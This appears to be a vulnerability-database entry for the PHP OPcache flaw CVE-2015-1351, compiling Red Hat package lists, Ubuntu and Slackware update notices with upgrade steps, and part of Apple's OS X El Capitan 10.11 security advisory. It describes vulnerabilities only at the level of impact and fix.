php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
php55-2.0-1.el7.src.rpm
php55-php-5.5.21-2.el7.src.rpm
x86_64:
php55-2.0-1.el7.x86_64.rpm
php55-php-5.5.21-2.el7.x86_64.rpm
php55-php-bcmath-5.5.21-2.el7.x86_64.rpm
php55-php-cli-5.5.21-2.el7.x86_64.rpm
php55-php-common-5.5.21-2.el7.x86_64.rpm
php55-php-dba-5.5.21-2.el7.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el7.x86_64.rpm
php55-php-devel-5.5.21-2.el7.x86_64.rpm
php55-php-enchant-5.5.21-2.el7.x86_64.rpm
php55-php-fpm-5.5.21-2.el7.x86_64.rpm
php55-php-gd-5.5.21-2.el7.x86_64.rpm
php55-php-gmp-5.5.21-2.el7.x86_64.rpm
php55-php-intl-5.5.21-2.el7.x86_64.rpm
php55-php-ldap-5.5.21-2.el7.x86_64.rpm
php55-php-mbstring-5.5.21-2.el7.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el7.x86_64.rpm
php55-php-odbc-5.5.21-2.el7.x86_64.rpm
php55-php-opcache-5.5.21-2.el7.x86_64.rpm
php55-php-pdo-5.5.21-2.el7.x86_64.rpm
php55-php-pgsql-5.5.21-2.el7.x86_64.rpm
php55-php-process-5.5.21-2.el7.x86_64.rpm
php55-php-pspell-5.5.21-2.el7.x86_64.rpm
php55-php-recode-5.5.21-2.el7.x86_64.rpm
php55-php-snmp-5.5.21-2.el7.x86_64.rpm
php55-php-soap-5.5.21-2.el7.x86_64.rpm
php55-php-xml-5.5.21-2.el7.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el7.x86_64.rpm
php55-runtime-2.0-1.el7.x86_64.rpm
php55-scldevel-2.0-1.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-8142
https://access.redhat.com/security/cve/CVE-2014-9427
https://access.redhat.com/security/cve/CVE-2014-9652
https://access.redhat.com/security/cve/CVE-2014-9705
https://access.redhat.com/security/cve/CVE-2014-9709
https://access.redhat.com/security/cve/CVE-2015-0231
https://access.redhat.com/security/cve/CVE-2015-0232
https://access.redhat.com/security/cve/CVE-2015-0273
https://access.redhat.com/security/cve/CVE-2015-1351
https://access.redhat.com/security/cve/CVE-2015-1352
https://access.redhat.com/security/cve/CVE-2015-2301
https://access.redhat.com/security/cve/CVE-2015-2305
https://access.redhat.com/security/cve/CVE-2015-2348
https://access.redhat.com/security/cve/CVE-2015-2787
https://access.redhat.com/security/cve/CVE-2015-4147
https://access.redhat.com/security/cve/CVE-2015-4148
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVcBWDXlSAg2UNWIIRAnzoAJ9qn4wDNXMD8JU1N7k7nEzKlPpGDwCgi0Si
MD3ZncY/P8Pl6+DgQxJQCjo=
=MxfY
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201503-0388 | CVE-2015-1351 | PHP Opcache Extended release vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Use-after-free vulnerability in the _zend_shared_memdup function in zend_shared_alloc.c in the OPcache extension in PHP through 5.6.7 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. PHP is prone to a denial-of-service vulnerability due to a user-after-free condition.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. OPcache is one of the extension components that improves PHP performance by storing the precompiled bytecode of PHP scripts in shared memory. ============================================================================
Ubuntu Security Notice USN-2501-1
February 17, 2015
php5 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in PHP. This issue only affected
Ubuntu 14.04 LTS and Ubuntu 14.10. This issue only
affected Ubuntu 14.04 LTS and Ubuntu 14.10.
This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. This issue only affected Ubuntu 14.04 LTS and
Ubuntu 14.10. (CVE-2015-1352)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.2
php5-cgi 5.5.12+dfsg-2ubuntu4.2
php5-cli 5.5.12+dfsg-2ubuntu4.2
php5-fpm 5.5.12+dfsg-2ubuntu4.2
php5-pgsql 5.5.12+dfsg-2ubuntu4.2
Ubuntu 14.04 LTS:
libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.6
php5-cgi 5.5.9+dfsg-1ubuntu4.6
php5-cli 5.5.9+dfsg-1ubuntu4.6
php5-fpm 5.5.9+dfsg-1ubuntu4.6
php5-pgsql 5.5.9+dfsg-1ubuntu4.6
Ubuntu 12.04 LTS:
libapache2-mod-php5 5.3.10-1ubuntu3.16
php5-cgi 5.3.10-1ubuntu3.16
php5-cli 5.3.10-1ubuntu3.16
php5-fpm 5.3.10-1ubuntu3.16
php5-pgsql 5.3.10-1ubuntu3.16
In general, a standard system update will make all the necessary changes.
Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/php-5.4.40-i486-1_slack14.1.txz: Upgraded.
This update fixes some security issues.
Please note that this package build also moves the configuration files
from /etc/httpd to /etc, /etc/php.d, and /etc/php-fpm.d.
For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9709
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3330
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.40-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.40-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.40-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.40-x86_64-1_slack14.1.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.8-i486-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.8-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 14.0 package:
2666059d6540b1b4385d25dfc5ebbe99 php-5.4.40-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
c146f500912ba9c7e5d652e5e3643c04 php-5.4.40-x86_64-1_slack14.0.txz
Slackware 14.1 package:
9efc8a96f9a3f3261e5f640292b1b781 php-5.4.40-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
2c95e077f314f1cfa3ee83b9aba90b91 php-5.4.40-x86_64-1_slack14.1.txz
Slackware -current package:
30d14f237c71fada0d594c2360a58016 n/php-5.6.8-i486-1.txz
Slackware x86_64 -current package:
1a0fcc590aa4dff5de5f08293936d0d9 n/php-5.6.8-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg php-5.4.40-i486-1_slack14.1.txz
Then, restart Apache httpd:
# /etc/rc.d/rc.httpd stop
# /etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2015-09-30-3 OS X El Capitan 10.11
OS X El Capitan 10.11 is now available and addresses the following:
Address Book
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to inject arbitrary code to
processes loading the Address Book framework
Description: An issue existed in Address Book framework's handling
of an environment variable. This issue was addressed through improved
environment variable handling.
CVE-ID
CVE-2015-5897 : Dan Bastone of Gotham Digital Science
AirScan
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may be able
to extract payload from eSCL packets sent over a secure connection
Description: An issue existed in the processing of eSCL packets.
This issue was addressed through improved validation checks.
CVE-ID
CVE-2015-5853 : an anonymous researcher
apache_mod_php
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP versions prior
to 5.5.27, including one which may have led to remote code execution.
This issue was addressed by updating PHP to version 5.5.27.
CVE-ID
CVE-2014-9425
CVE-2014-9427
CVE-2014-9652
CVE-2014-9705
CVE-2014-9709
CVE-2015-0231
CVE-2015-0232
CVE-2015-0235
CVE-2015-0273
CVE-2015-1351
CVE-2015-1352
CVE-2015-2301
CVE-2015-2305
CVE-2015-2331
CVE-2015-2348
CVE-2015-2783
CVE-2015-2787
CVE-2015-3329
CVE-2015-3330
Apple Online Store Kit
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may gain access to a user's keychain
items
Description: An issue existed in validation of access control lists
for iCloud keychain items. This issue was addressed through improved
access control list checks.
CVE-ID
CVE-2015-5836 : XiaoFeng Wang of Indiana University, Luyi Xing of
Indiana University, Tongxin Li of Peking University, Tongxin Li of
Peking University, Xiaolong Bai of Tsinghua University
AppleEvents
Available for: Mac OS X v10.6.8 and later
Impact: A user connected through screen sharing can send Apple
Events to a local user's session
Description: An issue existed with Apple Event filtering that
allowed some users to send events to other users. This was addressed
by improved Apple Event handling.
CVE-ID
CVE-2015-5849 : Jack Lawrence (@_jackhl)
Audio
Available for: Mac OS X v10.6.8 and later
Impact: Playing a malicious audio file may lead to an unexpected
application termination
Description: A memory corruption issue existed in the handling of
audio files. This issue issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.:
Prof. Taekyoung Kwon), Yonsei University, Seoul, Korea
bash
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in bash
Description: Multiple vulnerabilities existed in bash versions prior
to 3.2 patch level 57. These issues were addressed by updating bash
version 3.2 to patch level 57.
CVE-ID
CVE-2014-6277
CVE-2014-7186
CVE-2014-7187
Certificate Trust Policy
Available for: Mac OS X v10.6.8 and later
Impact: Update to the certificate trust policy
Description: The certificate trust policy was updated. The complete
list of certificates may be viewed at https://support.apple.com/en-
us/HT202858.
CFNetwork Cookies
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position can track a
user's activity
Description: A cross-domain cookie issue existed in the handling of
top level domains. The issue was address through improved
restrictions of cookie creation.
CVE-ID
CVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork FTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: Malicious FTP servers may be able to cause the client to
perform reconnaissance on other hosts
Description: An issue existed in the handling of FTP packets when
using the PASV command. This issue was resolved through improved
validation.
CVE-ID
CVE-2015-5912 : Amit Klein
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A maliciously crafted URL may be able to bypass HSTS and
leak sensitive data
Description: A URL parsing vulnerability existed in HSTS handling.
This issue was addressed through improved URL parsing.
CVE-ID
CVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A malicious website may be able to track users in Safari
private browsing mode
Description: An issue existed in the handling of HSTS state in
Safari private browsing mode. This issue was addressed through
improved state handling.
CVE-ID
CVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd
CFNetwork Proxies
Available for: Mac OS X v10.6.8 and later
Impact: Connecting to a malicious web proxy may set malicious
cookies for a website
Description: An issue existed in the handling of proxy connect
responses. This issue was addressed by removing the set-cookie header
while parsing the connect response.
CVE-ID
CVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: A certificate validation issue existed in NSURL when a
certificate changed. This issue was addressed through improved
certificate validation.
CVE-ID
CVE-2015-5824 : Timothy J. Wood of The Omni Group
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of RC4.
An attacker could force the use of RC4, even if the server preferred
better ciphers, by blocking TLS 1.0 and higher connections until
CFNetwork tried SSL 3.0, which only allows RC4. This issue was
addressed by removing the fallback to SSL 3.0.
CoreCrypto
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to determine a private key
Description: By observing many signing or decryption attempts, an
attacker may have been able to determine the RSA private key. This
issue was addressed using improved encryption algorithms.
CoreText
Available for: Mac OS X v10.6.8 and later
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in dyld. This was
addressed through improved memory handling.
CVE-ID
CVE-2015-5876 : beist of grayhash
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : @PanguTeam
Disk Images
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in DiskImages. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5847 : Filippo Bigarella, Luca Todesco
dyld
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : TaiG Jailbreak Team
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application can prevent some systems from
booting
Description: An issue existed with the addresses covered by the
protected range register. This issue was fixed by changing the
protected range.
CVE-ID
CVE-2015-5900 : Xeno Kovah & Corey Kallenberg from LegbaCore
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Apple Ethernet Thunderbolt adapter may be able
to affect firmware flashing
Description: Apple Ethernet Thunderbolt adapters could modify the
host firmware if connected during an EFI update. This issue was
addressed by not loading option ROMs during updates.
CVE-ID
CVE-2015-5914 : Trammell Hudson of Two Sigma Investments and snare
Finder
Available for: Mac OS X v10.6.8 and later
Impact: The "Secure Empty Trash" feature may not securely delete
files placed in the Trash
Description: An issue existed in guaranteeing secure deletion of
Trash files on some systems, such as those with flash storage. This
issue was addressed by removing the "Secure Empty Trash" option.
CVE-ID
CVE-2015-5901 : Apple
Game Center
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Game Center application may be able to access a
player's email address
Description: An issue existed in Game Center in the handling of a
player's email. This issue was addressed through improved access
restrictions.
CVE-ID
CVE-2015-5855 : Nasser Alnasser
Heimdal
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to replay Kerberos credentials to
the SMB server
Description: An authentication issue existed in Kerberos
credentials. This issue was addressed through additional validation
of credentials using a list of recently seen credentials.
CVE-ID
CVE-2015-5913 : Tarun Chopra of Microsoft Corporation, U.S. and Yu
Fan of Microsoft Corporation, China
ICU
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in ICU
Description: Multiple vulnerabilities existed in ICU versions prior
to 53.1.0. These issues were addressed by updating ICU to version
55.1.
CVE-ID
CVE-2014-8146
CVE-2014-8147
CVE-2015-5922
Install Framework Legacy
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to gain root privileges
Description: A restriction issue existed in the Install private
framework containing a privileged executable. This issue was
addressed by removing the executable.
CVE-ID
CVE-2015-5888 : Apple
Intel Graphics Driver
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: Multiple memory corruption issues existed in the Intel
Graphics Driver. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5830 : Yuki MIZUNO (@mzyy94)
CVE-2015-5877 : Camillus Gerard Cai
IOAudioFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in IOAudioFamily that led to the
disclosure of kernel memory content. This issue was addressed by
permuting kernel pointers.
CVE-ID
CVE-2015-5864 : Luca Todesco
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5871 : Ilja van Sprundel of IOActive
CVE-2015-5872 : Ilja van Sprundel of IOActive
CVE-2015-5873 : Ilja van Sprundel of IOActive
CVE-2015-5890 : Ilja van Sprundel of IOActive
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in IOGraphics which could have led to
the disclosure of kernel memory layout. This issue was addressed
through improved memory management.
CVE-ID
CVE-2015-5865 : Luca Todesco
IOHIDFamily
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: Multiple memory corruption issues existed in
IOHIDFamily. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5866 : Apple
CVE-2015-5867 : moony li of Trend Micro
IOStorageFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to read kernel memory
Description: A memory initialization issue existed in the kernel.
This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5863 : Ilja van Sprundel of IOActive
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
Kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team
CVE-2015-5896 : Maxime Villard of m00nbsd
CVE-2015-5903 : CESG
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local process can modify other processes without
entitlement checks
Description: An issue existed where root processes using the
processor_set_tasks API were allowed to retrieve the task ports of
other processes. This issue was addressed through additional
entitlement checks.
CVE-ID
CVE-2015-5882 : Pedro Vilaca, working from original research by
Ming-chieh Pan and Sung-ting Tsai; Jonathan Levin
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may control the value of stack cookies
Description: Multiple weaknesses existed in the generation of user
space stack cookies. These issues were addressed through improved
generation of stack cookies.
CVE-ID
CVE-2013-3951 : Stefan Esser
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to launch denial of service attacks
on targeted TCP connections without knowing the correct sequence
number
Description: An issue existed in xnu's validation of TCP packet
headers. This issue was addressed through improved TCP packet header
validation.
CVE-ID
CVE-2015-5879 : Jonathan Looney
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a local LAN segment may disable IPv6 routing
Description: An insufficient validation issue existed in the
handling of IPv6 router advertisements that allowed an attacker to
set the hop limit to an arbitrary value. This issue was addressed by
enforcing a minimum hop limit.
CVE-ID
CVE-2015-5869 : Dennis Spindel Ljungmark
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed that led to the disclosure of kernel
memory layout. This was addressed through improved initialization of
kernel memory structures.
CVE-ID
CVE-2015-5842 : beist of grayhash
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in debugging interfaces that led to
the disclosure of memory content. This issue was addressed by
sanitizing output from debugging interfaces.
CVE-ID
CVE-2015-5870 : Apple
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to cause a system denial of service
Description: A state management issue existed in debugging
functionality. This issue was addressed through improved validation.
CVE-ID
CVE-2015-5902 : Sergi Alvarez (pancake) of NowSecure Research Team
libc
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse
Corporation
libpthread
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team
libxpc
Available for: Mac OS X v10.6.8 and later
Impact: Many SSH connections could cause a denial of service
Description: launchd had no limit on the number of processes that
could be started by a network connection. This issue was addressed by
limiting the number of SSH processes to 40.
CVE-ID
CVE-2015-5881 : Apple
Login Window
Available for: Mac OS X v10.6.8 and later
Impact: The screen lock may not engage after the specified time
period
Description: An issue existed with captured display locking. The
issue was addressed through improved lock handling.
CVE-ID
CVE-2015-5833 : Carlos Moreira, Rainer Dorau of rainer dorau
informationsdesign, Chris Nehren, Kai Takac, Hans Douma, Toni
Vaahtera, and an anonymous researcher
lukemftpd
Available for: Mac OS X v10.6.8 and later
Impact: A remote attacker may be able to deny service to the FTP
server
Description: A glob-processing issue existed in tnftpd. This issue
was addressed through improved glob validation.
CVE-ID
CVE-2015-5917 : Maksymilian Arciemowicz of cxsecurity.com
Mail
Available for: Mac OS X v10.6.8 and later
Impact: Printing an email may leak sensitive user information
Description: An issue existed in Mail which bypassed user
preferences when printing an email. This issue was addressed through
improved user preference enforcement.
CVE-ID
CVE-2015-5881 : Owen DeLong of Akamai Technologies, Noritaka Kamiya,
Dennis Klein from Eschenburg, Germany, Jeff Hammett of Systim
Technology Partners
Mail
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position may be able to
intercept attachments of S/MIME-encrypted e-mail sent via Mail Drop
Description: An issue existed in handling encryption parameters for
large email attachments sent via Mail Drop. The issue is addressed by
no longer offering Mail Drop when sending an encrypted e-mail.
CVE-ID
CVE-2015-5884 : John McCombs of Integrated Mapping Ltd
Multipeer Connectivity
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to observe unprotected
multipeer data
Description: An issue existed in convenience initializer handling in
which encryption could be actively downgraded to a non-encrypted
session. This issue was addressed by changing the convenience
initializer to require encryption.
CVE-ID
CVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem
NetworkExtension
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An uninitialized memory issue in the kernel led to the
disclosure of kernel memory content. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2015-5831 : Maxime Villard of m00nbsd
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: An issue existed in parsing links in the Notes
application. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5878 : Craig Young of Tripwire VERT, an anonymous researcher
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: A cross-site scripting issue existed in parsing text by
